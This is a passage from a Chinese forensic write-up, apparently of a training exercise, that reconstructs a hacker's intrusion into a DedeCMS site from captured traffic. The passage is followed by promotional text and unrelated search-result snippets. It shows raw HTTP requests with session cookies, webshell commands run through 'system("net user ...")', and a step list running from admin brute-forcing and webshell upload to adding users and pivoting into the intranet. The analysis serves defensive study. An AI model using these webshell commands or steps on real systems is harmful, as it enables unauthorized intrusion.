    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

    Accept-Encoding: gzip, deflate

    Referer: http://118.194.196.232:800/simplexue/file_manage_view.php?fmdo=del&filename=tunnel.php&activepath=

    Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager

    Connection: keep-alive

    Content-Type: application/x-www-form-urlencoded

    Content-Length: 74

    fmdo=del&activepath=&filename=tunnel.php&imageField1.x=34&imageField1.y=17

    然后,黑客删除了自己添加的用户

    Form item: "g" = "system("net user test /del");"

    Form item: "g" = "system("net user");"

    最后,黑客再次利用file_manage_control.php删除了自己的一句话木马文件

    POST /simplexue/file_manage_control.php HTTP/1.1

    Host: 118.194.196.232:800

    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

    Accept-Encoding: gzip, deflate

    Referer: http://118.194.196.232:800/simplexue/file_manage_view.php?fmdo=del&filename=jian.php&activepath=%2Fuploads

    Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager

    Connection: keep-alive

    Content-Type: application/x-www-form-urlencoded

    Content-Length: 82

    fmdo=del&activepath=%2Fuploads&filename=jian.php&imageField1.x=31&imageField1.y=17

    至此全渗透过程结束

    后记

    总体来说,黑客做了如下事情

    1.目录爆破

    2.爆破后台管理员账户

    3.寻找利用后台可利用功能

    4.一句话木马上传

    5.利用木马在目标机器上添加管理员用户

    6.黑客上传反向代理文件

    7.黑客进行内网渗透

    8.黑客结束渗透,进行尾部处理工作

    由于时间关系,中间内网渗透部分就没详细分析,有兴趣的可以自行分析

    本文题目链接:

    https://pan.baidu.com/s/183Eg8CKOjr96u1YEuQvq_A
    密码:qtv7

    (完)

    看不过瘾?合天2017年度干货精华请点击《【精华】2017年度合天网安干货集锦

    别忘了投稿哦!

    合天公众号开启原创投稿啦!!!

    大家有好的技术原创文章。

    欢迎投稿至邮箱:edu@heetian.com

    合天会根据文章的时效、新颖、文笔、实用等多方面评判给予100元-500元不等的稿费哟。

    有才能的你快来投稿吧!

    重金悬赏 | 合天原创投稿等你来!

    展开全文
  • 近日发布的一项调查结果显示,中型企业正在加入虚拟化技术来实现在硬件、能源和空间方面的成本节约。 King Research在今年10月对519位IT专家所做的调查显示,有超过75%的受访者已经配置了某种虚拟化技术,有10%的受...
  • 现在,人们熟悉的消费者Web 技术━━例如博客和wiki,正在向企业渗透,而推动这一趋势的就是企业员工。业界观察人士指出,这些流行的Web 2.0 技术是在工作场所进行协作的一种有效途径,它们简单、易用,这使得它们...
  • 企业环境渗透2

    2020-06-05 11:37:12
    企业环境渗透2 在网上浏览时偶然间发现这位同学的博客,我写的话和他的内容估计差不多,就不再写了,大家可以参考这篇博客(希望这位同学如果看到的话,不要介意我在没有征得您本人的同意就将链接分享,因为比较麻烦...
  • 企业环境渗透1

    2020-05-26 19:43:43
    企业环境渗透1 网络安全的实验可以说是十足的干货,作为初学者来说,各种工具的应用就令人头疼了,更不要说是需要自己动手修改工具参数了。本门实验课快到了结课的时候了,我参考了网上的一些资料和某些大佬写的博客...
  • 手动测试作为自动测试的一种补充,是渗透测试过程中必不可少的一个重要部分。渗透测试不同于传统的安全扫描,在整体风险评估框架中,脆弱性与安全扫描的关系可描述为“承上”,是对扫描结果的一种验证和补充。
  • 企业环境渗透1(2)

    2020-05-27 21:24:21
    企业环境渗透1(2) 昨天写了一下企业环境渗透1的前几个任务,比较简单,我看大家看的比较多,可能是催更的意思,今天我就接着上一篇博文来写。 任务4:扫描pc端并登陆 首先登陆到网站后台,在模块文件管理器中可以...
  • 大型企业渗透思路

    2015-04-27 10:29:00
    一、信息搜集(这个是先决条件了,一般成败就在于这里) 主要对于子域名(2级、3级、4级);管理员(工作人员、...可以尝试爆破)程序员信息(可以尝试渗透程序员PC机,大多数程序员本机都有源代码备份)二、漏洞...
  • 对于企业渗透的工程化流程,基本上可以靠几个常规工具来完成,在不考虑IDS的情况下,可以在半小时内完成。 基本流程:获取ntds,hash注入或者密码登录,执行payload,系统自带的vssadmin,ntdsutil,cobalt...
  • icecolor · 2016/06/21 10:03author: icecolor0x00 企业级无线渗透注:这篇文章里我详细说一下针对企业802.1X的安全解析,还有一些针对数据协议的分析方法和浅析关于个人渗透太多太啰嗦我就不写了,有机会在说。...
  • 课程时间很长,下面是我看完以后提取了一些对我有用的内容: ...2.渗透的步骤: 1.找到对外发布的网站的漏洞 2.利用漏洞拿到网站的webshell 3.提权到system权限 权限:guest < user < administrator < ...
  • 在现代企业经营管理教学中渗透创业教育的探索不仅能给你参考与借鉴,还能够让学到许多成功方法与技巧,赶...该文档为在现代企业经营管理教学中渗透创业教育的探索,是一份很不错的参考资料,具有较高参考价值,感...
  • 转载于:https://www.cnblogs.com/sky--/p/5841575.html
  • “数据,已经渗透到当今每一个行业和业务职能领域,成为重要的生产因素。人们对于海量数据的挖掘和运用,预示着新一波生产率增长和消费者盈余浪潮的到来”。 这句话如果放在5年前,你可能会很困惑。但今天,大数据...
  • 作为一种全新意义的基于802.11 标准的技术,无线网状网不仅仅只是消除用户对于线缆的约束,更多将会在企业 和行业市场中通过将数据以无线方式接 入到有线宽带网,大幅减少了对成本高 昂的有线连接的需求,并降低了...
  • 本文讲的是 : 瑞星专家详谈企业防黑渗透测试的必要性, 【IT168技术】随着电子商务、电子政务的发展,越来越多的重点单位和企业在安全上投入了巨大的精力和资金,但有时候用户会有这样的感受:当基本的软硬件设施配置...
  • 在项目中遇到SAML企业应用 想留个后门时候一脸懵 随便的整理记录 记录项目中SAML渗透的知识点。 0x01 前置知识 SAML单点登陆 SAML(Security Assertion Markup Language)是一个XML框架,也就是一组协议,可以...
  • 渗透

    2019-05-05 21:35:00
    2019独角兽企业重金招聘Python工程师标准>>> ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 2,564
精华内容 1,025
关键字:

企业渗透